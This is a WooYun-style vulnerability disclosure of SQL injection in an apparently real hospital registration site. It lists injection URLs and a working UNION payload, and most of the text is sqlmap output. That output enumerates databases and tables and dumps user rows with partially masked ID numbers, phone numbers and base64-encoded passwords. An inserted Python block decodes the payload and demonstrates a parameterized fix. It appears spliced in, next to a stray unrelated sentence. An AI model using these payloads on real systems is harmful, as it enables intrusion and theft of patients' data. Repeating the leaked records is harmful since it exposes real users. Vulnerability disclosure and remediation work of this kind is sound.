WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-12-09: Details sent to the vendor, awaiting vendor handling
2015-12-11: Vendor confirmed; details disclosed to the vendor only
2015-12-21: Details disclosed to core white hats and experts in the relevant field
2015-12-31: Details disclosed to regular white hats
2016-01-10: Details disclosed to intern white hats
2016-01-23: Details disclosed to the public
http://**.**.**.**/
Injection points:
http://**.**.**.**/plSearchByDoctor.aspx?Doctor=
http://**.**.**.**/plSearchHospital2.aspx?ID=2027
http://**.**.**.**/plSearchList.aspx?TYPE=DEPT&ID=%27%20or%20%271%27=%271
http://**.**.**.**/zkDoctorList.aspx?Type=
http://**.**.**.**/zkZiXun.aspx?ID=ZK00000019
http://**.**.**.**/zkYuYue.aspx?HOSPITALID=ZK00000019
Taking the plSearchByDoctor.aspx?Doctor= injection point as an example:
Payload: Doctor=-9051%' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(115)+CHAR(74)+CHAR(79)+CHAR(112)+CHAR(77)+CHAR(108)+CHAR(122)+CHAR(89)+CHAR(111)+CHAR(66)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113)--
---
[16:27:06] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[16:27:06] [INFO] testing if current user is DBA
current user is DBA: True

Payload: Doctor=-9051%' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(115)+CHAR(74)+CHAR(79)+CHAR(112)+CHAR(77)+CHAR(108)+CHAR(122)+CHAR(89)+CHAR(111)+CHAR(66)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113)--
---
[16:22:07] [INFO] testing Microsoft SQL Server
[16:22:08] [INFO] confirming Microsoft SQL Server
[16:22:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[16:22:12] [INFO] fetching database names
[16:22:13] [INFO] the SQL query used returns 10 entries
[16:22:15] [INFO] retrieved: Car
[16:22:16] [INFO] retrieved: demo
[16:22:18] [INFO] retrieved: master
[16:22:20] [INFO] retrieved: model
[16:22:21] [INFO] retrieved: msdb
[16:22:23] [INFO] retrieved: PLATFORM
[16:22:25] [INFO] retrieved: REPAIR
[16:22:26] [INFO] retrieved: tempdb
[16:22:28] [INFO] retrieved: XLIST
[16:22:29] [INFO] retrieved: YYGH
available databases [10]:
[*] Car
[*] demo
[*] master
[*] model
[*] msdb
[*] PLATFORM
[*] REPAIR
[*] tempdb
[*] XLIST
[*] YYGH
Payload: Doctor=-4313%' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(82)+CHAR(72)+CHAR(76)+CHAR(102)+CHAR(109)+CHAR(83)+CHAR(74)+CHAR(71)+CHAR(111)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(118)+CHAR(113)--
---
[16:41:40] [INFO] testing Microsoft SQL Server
[16:41:41] [INFO] confirming Microsoft SQL Server
[16:41:45] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[16:41:45] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[16:41:45] [INFO] fetching tables for database: YYGH
[16:41:47] [INFO] the SQL query used returns 108 entries
[16:41:48] [INFO] retrieved: dbo.202Admin
[16:41:50] [INFO] retrieved: dbo.202Backup
[16:41:52] [INFO] retrieved: dbo.202Dept
[16:41:53] [INFO] retrieved: dbo.202Level
[16:41:55] [INFO] retrieved: dbo.202Log
[16:41:57] [INFO] retrieved: dbo.202OrderBase
[16:41:58] [INFO] retrieved: dbo.202OrderExpert
[16:42:00] [INFO] retrieved: dbo.202OutCall
[16:42:02] [INFO] retrieved: dbo.463Admin
[16:42:03] [INFO] retrieved: dbo.463Backup
[16:42:05] [INFO] retrieved: dbo.463Dept
[16:42:07] [INFO] retrieved: dbo.463OrderExpert
[16:42:09] [INFO] retrieved: dbo.AdminHos
[16:42:10] [INFO] retrieved: dbo.AdminHos
[16:42:12] [INFO] retrieved: dbo.AdminHos
[16:42:14] [INFO] retrieved: dbo.AdminUser
[16:42:16] [INFO] retrieved: dbo.Advice
[16:42:18] [INFO] retrieved: dbo.BaoXianUser
[16:42:20] [INFO] retrieved: dbo.Code_Admin
[16:42:22] [INFO] retrieved: dbo.Code_Area
[16:42:23] [INFO] retrieved: dbo.Code_Arrange
[16:42:26] [INFO] retrieved: dbo.Code_Blood
[16:42:27] [INFO] retrieved: dbo.Code_Degree
[16:42:29] [INFO] retrieved: dbo.Code_DeptLevel
[16:42:31] [INFO] retrieved: dbo.Code_DeptLevel
[16:42:33] [INFO] retrieved: dbo.Code_Education
[16:42:34] [INFO] retrieved: dbo.Code_HosLevel
[16:42:36] [INFO] retrieved: dbo.Code_HosType
[16:42:38] [INFO] retrieved: dbo.Code_Job
[16:42:39] [INFO] retrieved: dbo.Code_Level
[16:42:41] [INFO] retrieved: dbo.Code_Paper
[16:42:43] [INFO] retrieved: dbo.Code_Practice
[16:42:44] [INFO] retrieved: dbo.Code_Professional
[16:42:46] [INFO] retrieved: dbo.Code_ProfessionalType
[16:42:48] [INFO] retrieved: dbo.Code_RH
[16:42:49] [INFO] retrieved: dbo.Code_Sex
[16:42:51] [INFO] retrieved: dbo.DeptInfo
[16:42:52] [INFO] retrieved: dbo.DiseaseBase
[16:42:54] [INFO] retrieved: dbo.DiseaseBase
[16:42:59] [INFO] retrieved: dbo.DoctAdvice
[16:43:00] [INFO] retrieved: dbo.DoctInfo
[16:43:02] [INFO] retrieved: dbo.DoctTotal
[16:43:04] [INFO] retrieved: dbo.Health_Lecture
[16:43:05] [INFO] retrieved: dbo.Health_Memo
[16:43:08] [INFO] retrieved: dbo.Health_Record
[16:43:10] [INFO] retrieved: dbo.Health_Warning
[16:43:12] [INFO] retrieved: dbo.HealthGuide
[16:43:13] [INFO] retrieved: dbo.HealthHeart
[16:43:15] [INFO] retrieved: dbo.HealthLecture
[16:43:16] [INFO] retrieved: dbo.HealthPressure
[16:43:18] [INFO] retrieved: dbo.HealthWarning
[16:43:20] [INFO] retrieved: dbo.HealthWiki
[16:43:22] [INFO] retrieved: dbo.HintDetail
[16:43:23] [INFO] retrieved: dbo.HintDetail
[16:43:25] [INFO] retrieved: dbo.HospitalDynamic
[16:43:27] [INFO] retrieved: dbo.HospitalDynamic
[16:43:28] [INFO] retrieved: dbo.HospitalHot
[16:43:30] [INFO] retrieved: dbo.HospitalPaiming
[16:43:32] [INFO] retrieved: dbo.HospitalRank
[16:43:33] [INFO] retrieved: dbo.IpAddress
[16:43:35] [INFO] retrieved: dbo.JIBIE
[16:43:37] [INFO] retrieved: dbo.JoinInAD
[16:43:38] [INFO] retrieved: dbo.JoinInHospital
[16:43:40] [INFO] retrieved: dbo.LNZY_DepartmentInformation
[16:43:42] [INFO] retrieved: dbo.LNZY_DoctorInformation
[16:43:44] [INFO] retrieved: dbo.LNZY_HospitalInformation
[16:43:46] [INFO] retrieved: dbo.LNZY_Log
[16:43:47] [INFO] retrieved: dbo.LNZY_PreRegister
[16:43:49] [INFO] retrieved: dbo.LNZY_ScheduleInformation
[16:43:51] [INFO] retrieved: dbo.LNZY_String
[16:43:53] [INFO] retrieved: dbo.lock_user
[16:43:54] [INFO] retrieved: dbo.Log
[16:43:59] [INFO] retrieved: dbo.LSB
[16:44:01] [INFO] retrieved: dbo.MediaReport
[16:44:02] [INFO] retrieved: dbo.Memo
[16:44:04] [INFO] retrieved: dbo.money_add
[16:44:06] [INFO] retrieved: dbo.money_all
[16:44:07] [INFO] retrieved: dbo.money_t
[16:44:10] [INFO] retrieved: dbo.NewsDynamic
[16:44:11] [INFO] retrieved: dbo.NewsDynamic
[16:44:13] [INFO] retrieved: dbo.NewsQuestion
[16:44:15] [INFO] retrieved: dbo.QuestionMoney
[16:44:16] [INFO] retrieved: dbo.QuestionMoney
[16:44:18] [INFO] retrieved: dbo.R_PREREGISTER
[16:44:20] [INFO] retrieved: dbo.reg_user
[16:44:22] [INFO] retrieved: dbo.SerialNum
[16:44:24] [INFO] retrieved: dbo.SMS
[16:44:26] [INFO] retrieved: dbo.SX_Return
[16:44:27] [INFO] retrieved: dbo.SX_Return
[16:44:29] [INFO] retrieved: dbo.SX_Save
[16:44:30] [INFO] retrieved: dbo.system32
[16:44:32] [INFO] retrieved: dbo.temp
[16:44:34] [INFO] retrieved: dbo.user_reg
[16:44:36] [INFO] retrieved: dbo.YaoFang
[16:44:37] [INFO] retrieved: dbo.ZK_AdHistory
[16:44:39] [INFO] retrieved: dbo.ZK_AdHistory
[16:44:41] [INFO] retrieved: dbo.ZK_Admin
[16:44:57] [INFO] retrieved: dbo.ZK_AuthorityTechnology
[16:44:58] [INFO] retrieved: dbo.ZK_ClassCase
[16:45:00] [INFO] retrieved: dbo.ZK_DepartmentInformation
[16:45:01] [INFO] retrieved: dbo.ZK_DoctorInformation
[16:45:03] [INFO] retrieved: dbo.ZK_Flash
[16:45:05] [INFO] retrieved: dbo.ZK_HospitalInformation
[16:45:06] [INFO] retrieved: dbo.ZK_ImgNews
[16:45:08] [INFO] retrieved: dbo.ZK_MediaReport
[16:45:10] [INFO] retrieved: dbo.ZK_MedicalEquipment
[16:45:12] [INFO] retrieved: dbo.ZK_Register
[16:45:14] [INFO] retrieved: dbo.ZK_TopicRead
[16:45:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:45:14] [INFO] retrieved:
[16:45:15] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[16:45:15] [INFO] retrieved:
[16:45:16] [INFO] retrieved:
[16:45:17] [INFO] retrieved:
[16:45:18] [INFO] retrieved:
[16:45:19] [INFO] retrieved:
[16:45:20] [INFO] retrieved:
[16:45:21] [INFO] retrieved:
[16:45:22] [INFO] retrieved:
[16:45:23] [INFO] retrieved:
[16:45:24] [INFO] retrieved:
[16:45:25] [INFO] retrieved:
Database: YYGH
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| dbo.IpAddress                  | 444969  |
| dbo.money_all                  | 179048  |
| dbo.reg_user                   | 125311  |
| dbo.Log                        | 62794   |
| dbo.R_PREREGISTER              | 41798   |
| dbo.user_reg                   | 28246   |
| dbo.money_add                  | 25609   |
| dbo.HintDetail                 | 13686   |
| dbo.HintDetail                 | 13686   |
| dbo.QuestionMoney              | 4276    |
| dbo.QuestionMoney              | 4276    |
| dbo.money_t                    | 2562    |
| dbo.YaoFang                    | 2516    |
| dbo.DoctTotal                  | 1018    |
| dbo.DoctInfo                   | 800     |
| dbo.JoinInHospital             | 672     |
| dbo.Memo                       | 480     |
| dbo.JoinInAD                   | 452     |
| dbo.SX_Save                    | 331     |
| dbo.HospitalPaiming            | 270     |
| dbo.ZK_Register                | 237     |
| dbo.LNZY_Log                   | 193     |
| dbo.LNZY_String                | 193     |
| dbo.ZK_ClassCase               | 135     |
| dbo.ZK_MediaReport             | 134     |
| dbo.ZK_AuthorityTechnology     | 131     |
| dbo.Code_Area                  | 129     |
| dbo.ZK_MedicalEquipment        | 122     |
| dbo.temp                       | 119     |
| dbo.LNZY_ScheduleInformation   | 118     |
| dbo.ZK_DoctorInformation       | 78      |
| dbo.MediaReport                | 73      |
| dbo.DiseaseBase                | 72      |
| dbo.DiseaseBase                | 72      |
| dbo.Advice                     | 43      |
| dbo.ZK_ImgNews                 | 40      |
| dbo.lock_user                  | 36      |
| dbo.Code_HosType               | 33      |
| dbo.DeptInfo                   | 32      |
| dbo.Code_Professional          | 24      |
| dbo.ZK_HospitalInformation     | 21      |
| dbo.HealthPressure             | 20      |
| dbo.ZK_DepartmentInformation   | 20      |
| dbo.DoctAdvice                 | 19      |
| dbo.HospitalHot                | 19      |
| dbo.ZK_Admin                   | 19      |
| dbo.ZK_TopicRead               | 17      |
| dbo.SMS                        | 15      |
| dbo.Code_ProfessionalType      | 14      |
| dbo.LNZY_DoctorInformation     | 14      |
| dbo.HealthGuide                | 13      |
| dbo.SX_Return                  | 12      |
| dbo.SX_Return                  | 12      |
| dbo.HospitalRank               | 11      |
| dbo.NewsDynamic                | 11      |
| dbo.NewsDynamic                | 11      |
| dbo.HealthHeart                | 10      |
| dbo.HospitalDynamic            | 10      |
| dbo.HospitalDynamic            | 10      |
| dbo.Code_HosLevel              | 9       |
| dbo.NewsQuestion               | 9       |
| dbo.JIBIE                      | 8       |
| dbo.ZK_Flash                   | 8       |
| dbo.Code_Education             | 7       |
| dbo.Code_Blood                 | 6       |
| dbo.Code_Job                   | 6       |
| dbo.Code_Admin                 | 5       |
| dbo.LNZY_DepartmentInformation | 5       |
| dbo.AdminUser                  | 4       |
| dbo.Code_Degree                | 4       |
| dbo.Code_Paper                 | 4       |
| dbo.Code_Practice              | 4       |
| dbo.Code_RH                    | 4       |
| dbo.Code_Sex                   | 4       |
| dbo.Code_Arrange               | 3       |
| dbo.Code_DeptLevel             | 3       |
| dbo.Code_DeptLevel             | 3       |
| dbo.Code_Level                 | 3       |
| dbo.system32                   | 3       |
| dbo.Health_Lecture             | 2       |
| dbo.Health_Memo                | 2       |
| dbo.Health_Record              | 2       |
| dbo.LNZY_PreRegister           | 2       |
| dbo.ZK_AdHistory               | 2       |
| dbo.ZK_AdHistory               | 2       |
| dbo.AdminHos                   | 1       |
| dbo.AdminHos                   | 1       |
| dbo.AdminHos                   | 1       |
| dbo.Health_Warning             | 1       |
| dbo.HealthLecture              | 1       |
| dbo.HealthWarning              | 1       |
| dbo.SerialNum                  | 1       |
+--------------------------------+---------+
Payload: Doctor=-4313%' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(82)+CHAR(72)+CHAR(76)+CHAR(102)+CHAR(109)+CHAR(83)+CHAR(74)+CHAR(71)+CHAR(111)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(107)+CHAR(118)+CHAR(113)--
---
[16:56:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[16:56:30] [INFO] fetching columns for table 'reg_user' in database 'YYGH'
[16:56:31] [INFO] the SQL query used returns 25 entries
[16:56:33] [INFO] retrieved: "answer","varchar"
[16:56:35] [INFO] retrieved: "birthday","datetime"
[16:56:36] [INFO] retrieved: "email","varchar"
[16:56:38] [INFO] retrieved: "id","bigint"
[16:56:39] [INFO] retrieved: "job","nvarchar"
[16:56:41] [INFO] retrieved: "money","money"
[16:56:43] [INFO] retrieved: "name","nvarchar"
[16:56:44] [INFO] retrieved: "now","datetime"
[16:56:47] [INFO] retrieved: "oldmoney","money"
[16:56:48] [INFO] retrieved: "password","nvarchar"
[16:56:50] [INFO] retrieved: "phone","nvarchar"
[16:56:52] [INFO] retrieved: "postcode","nvarchar"
[16:56:53] [INFO] retrieved: "question","varchar"
[16:56:55] [INFO] retrieved: "sex","nvarchar"
[16:56:57] [INFO] retrieved: "sf","nvarchar"
[16:56:59] [INFO] retrieved: "sh","nvarchar"
[16:57:01] [INFO] retrieved: "SMS","int"
[16:57:02] [INFO] retrieved: "tel1","nvarchar"
[16:57:04] [INFO] retrieved: "tel1","nvarchar"
[16:57:06] [INFO] retrieved: "username","nvarchar"
[16:57:08] [INFO] retrieved: "vipfy","nvarchar"
[16:57:10] [INFO] retrieved: "vipfy","nvarchar"
[16:57:12] [INFO] retrieved: "viptime","datetime"
[16:57:15] [INFO] retrieved: "WeiXin","varchar"
[16:57:18] [INFO] retrieved: "ybk","nvarchar"
[16:57:18] [INFO] fetching entries for table 'reg_user' in database 'YYGH'
[16:57:21] [INFO] fetching number of distinct values for column 'id'
[16:57:23] [INFO] fetching number of distinct values for column 'sf'
[16:57:25] [INFO] fetching number of distinct values for column 'sh'
[16:57:27] [INFO] fetching number of distinct values for column 'SMS'
[16:57:29] [INFO] fetching number of distinct values for column 'job'
[16:57:31] [INFO] fetching number of distinct values for column 'now'
[16:57:32] [INFO] fetching number of distinct values for column 'sex'
[16:57:34] [INFO] fetching number of distinct values for column 'ybk'
[16:57:36] [INFO] fetching number of distinct values for column 'name'
[16:57:37] [INFO] fetching number of distinct values for column 'tel1'
[16:57:39] [INFO] fetching number of distinct values for column 'email'
[16:57:41] [INFO] fetching number of distinct values for column 'money'
[16:57:46] [INFO] fetching number of distinct values for column 'phone'
[16:57:47] [INFO] fetching number of distinct values for column 'vipfy'
[16:57:50] [INFO] fetching number of distinct values for column 'WeiXin'
[16:57:53] [INFO] fetching number of distinct values for column 'answer'
[16:57:55] [INFO] fetching number of distinct values for column 'viptime'
[16:57:57] [INFO] fetching number of distinct values for column 'birthday'
[16:58:03] [INFO] fetching number of distinct values for column 'oldmoney'
[16:58:05] [INFO] fetching number of distinct values for column 'password'
[16:58:07] [INFO] fetching number of distinct values for column 'postcode'
[16:58:09] [INFO] fetching number of distinct values for column 'question'
[16:58:10] [INFO] fetching number of distinct values for column 'username'
[16:58:12] [WARNING] no proper pivot column provided (with unique values). It won't be possible to retrieve all rows
[16:59:37] [INFO] analyzing table dump for possible password hashes
Database: YYGH
Table: reg_user
[2 entries]
[16:59:37] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://**.**.**.**/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.

| id | sh | sf | SMS | sex | now | ybk | job | tel1 | name | vipfy | money | email | phone | WeiXin | answer | viptime | oldmoney | postcode | question | username | birthday | password |
(first row; the leading id/sh/sf/SMS/sex/now/ybk cells were lost in the console output, and the Chinese text columns appear as mojibake)
| ???????÷ˇá???÷ˇá?ň??????????×é | 139****1241 | ???¤ | NULL | 0.00 | NULL | NULL | NULL | ???? | 01 1 1900 12:00AM | 0.00 | 110000 | ?????????? | ???¤???? | 07 21 1985 12:00AM | ODM4ODM4bGlkYQ== |
| 100000 | 1 | 210904********1019 | 0 | 1 | 03 19 2015 12:00AM | NULL | <blank> | 138****9696 | ?????? | NULL | 0.00 | [email protected]om | NULL | NULL | NULL | NULL | NULL | <blank> | NULL | lizhihualzh | 06 2 1958 12:00AM | MDAwMDAw |

(National ID number and phone numbers are partially masked here; the remaining values are as dumped.)
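Two things in the output above are worth replaying by hand: what the `CHAR(113)+CHAR(120)+...` tail of the UNION payload actually is, and what the `password` column of `reg_user` holds. The block below is an added example, not code from the report or from the affected application. It decodes the CHAR() chain from the first payload (sqlmap's 5-character boundary markers around a random body, which is how sqlmap finds its own output in the response), then replays the injection against a constructed five-column stand-in table in SQLite (an assumption: the real target is ASP.NET on SQL Server 2005, and the `%'` prefix in the payload shows the parameter lands inside a `LIKE '%...%'` clause), contrasting the concatenated query with a parameterized one. The CHAR() chain is replaced by a quoted literal because SQLite has no `CHAR()+` concatenation. Finally it checks whether a dumped `password` value is base64 of printable text rather than a hash.

```python
import base64
import re
import sqlite3

# --- 1. Decode the sqlmap probe string -----------------------------------------
# sqlmap avoids quotes in MSSQL payloads by building its marker as CHAR(n)+CHAR(n)+...
CHAR_RE = re.compile(r"CHAR\((\d+)\)")


def decode_char_chain(expr: str) -> str:
    """Turn 'CHAR(113)+CHAR(120)+...' into the string it concatenates to."""
    return "".join(chr(int(n)) for n in CHAR_RE.findall(expr))


def split_sqlmap_marker(s: str):
    """sqlmap wraps a 10-char random body in 5-char prefix/suffix boundary markers
    so it can locate its own reflected output; return (prefix, body, suffix)."""
    return s[:5], s[5:-5], s[-5:]


# CHAR() chain copied from the report's first payload.
PAYLOAD_1_CHARS = (
    "CHAR(113)+CHAR(120)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(115)+CHAR(74)+CHAR(79)"
    "+CHAR(112)+CHAR(77)+CHAR(108)+CHAR(122)+CHAR(89)+CHAR(111)+CHAR(66)+CHAR(113)"
    "+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113)"
)

# --- 2. Replay the injection against a stand-in schema -------------------------
# ASSUMPTION: SQLite stands in for SQL Server 2005. The five-column shape is taken
# from the payload (four NULLs plus the marker). Rows are constructed sample data.
SCHEMA = """
CREATE TABLE DoctInfo (id INTEGER, name TEXT, dept TEXT, title TEXT, hospital TEXT);
INSERT INTO DoctInfo VALUES (1, 'Zhang Wei', 'Cardiology', 'Chief physician', 'Hospital A');
INSERT INTO DoctInfo VALUES (2, 'Li Na', 'Neurology', 'Attending', 'Hospital B');
"""


def fresh_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def search_vulnerable(con: sqlite3.Connection, doctor: str):
    # The pattern implied by the report: user input concatenated inside LIKE '%...%'.
    sql = f"SELECT id, name, dept, title, hospital FROM DoctInfo WHERE name LIKE '%{doctor}%'"
    return con.execute(sql).fetchall()


def search_parameterized(con: sqlite3.Connection, doctor: str):
    # Bind the whole pattern as one value; the input can never close the quote.
    sql = "SELECT id, name, dept, title, hospital FROM DoctInfo WHERE name LIKE ?"
    return con.execute(sql, (f"%{doctor}%",)).fetchall()


MARKER = decode_char_chain(PAYLOAD_1_CHARS)
# Same structure as the report's payload; a quoted literal replaces the CHAR() chain
# and the trailing '-- ' comments out the closing %' of the original LIKE clause.
INJECTION = f"-9051%' UNION ALL SELECT NULL,NULL,NULL,NULL,'{MARKER}'-- "


# --- 3. What the dumped "password" column holds --------------------------------
def decode_if_base64_text(value: str):
    """Return the decoded text if value is base64 of printable ASCII, else None.
    A real password hash would not decode to printable text like this."""
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if not raw.isascii():
        return None
    text = raw.decode("ascii")
    return text if text.isprintable() else None


if __name__ == "__main__":
    print("marker:", MARKER, split_sqlmap_marker(MARKER))
    print("concatenated query:", search_vulnerable(fresh_db(), INJECTION))
    print("parameterized query:", search_parameterized(fresh_db(), INJECTION))
    print("second dumped password value decodes to:", decode_if_base64_text("MDAwMDAw"))
```

With the concatenated query the injected SELECT contributes a row whose fifth column is the marker, which is exactly what sqlmap looks for in the response; the parameterized query treats the same input as a literal pattern and returns nothing. Parameterization fixes the injection; it does not by itself stop `%` and `_` in user input from acting as LIKE wildcards, so escape those too if the search is meant to be literal.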
You are more expert at this than I am.
Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-12-11 17:57
CNVD has confirmed and reproduced the reported issue; it has been handed to CNCERT, which forwarded it to the Liaoning branch centre to coordinate remediation with the website's operating organisation.
None yet